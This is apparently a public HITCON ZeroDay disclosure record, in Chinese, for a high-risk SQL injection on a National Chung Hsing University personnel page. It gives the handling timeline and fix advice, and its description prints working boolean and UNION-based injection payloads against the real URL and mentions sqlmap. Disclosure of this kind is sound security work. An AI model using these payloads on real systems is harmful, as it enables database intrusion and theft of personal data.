Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2019-01107
- 發信 Vendor: 國立中興大學
- Title: 國立中興大學人事室 SQL Injection
- Introduction: SQL Injection
處理狀態
目前狀態
公開
Last Update : 2019/11/16
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2019/09/16 23:59:04 : 新提交 (由 SomeApple 更新此狀態)
- 2019/09/17 00:01:06 : 新提交 (由 SomeApple 更新此狀態)
- 2019/09/17 00:04:21 : 新提交 (由 SomeApple 更新此狀態)
- 2019/09/17 21:55:04 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/09/21 10:25:21 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/09/21 10:25:21 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/09/21 10:25:21 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/10/02 08:54:26 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/10/03 23:01:10 : 未修補完成 (由 SomeApple 更新此狀態)
- 2019/11/16 03:00:13 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2019-01107
- 通報者:jk82421 (SomeApple)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://person.nchu.edu.tw/areaRegulations.php?areaid=3
敘述
網址為:http://person.nchu.edu.tw/areaRegulations.php?areaid=3
左上角圖片原本為
最後面的 payload 改成 http://person.nchu.edu.tw/areaRegulations.php?areaid=3 and 1=23
但發現圖左上角圖片出不來了
再把 Payload 改成 最後面的 payload 改成 http://person.nchu.edu.tw/areaRegulations.php?areaid=3 and 1=1
左上角圖片又再度出現
以此判別有 SQL Injection,再把 Payload 改成 http://person.nchu.edu.tw/areaRegulations.php?areaid=3 union all select 1,database(),3,4,5,6,7
就出現 database 的名稱了
以下為丟到 sqlmap 出現的結果
修補建議
1. 請過濾使用者輸入以及任何可以更改並把參數帶入到後端的輸入
2. 建議用 regular expression 去過濾阻擋
3. 使用 prepared statement 去組 sql 語句
以上上網搜尋應該都會有相對應的教學
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。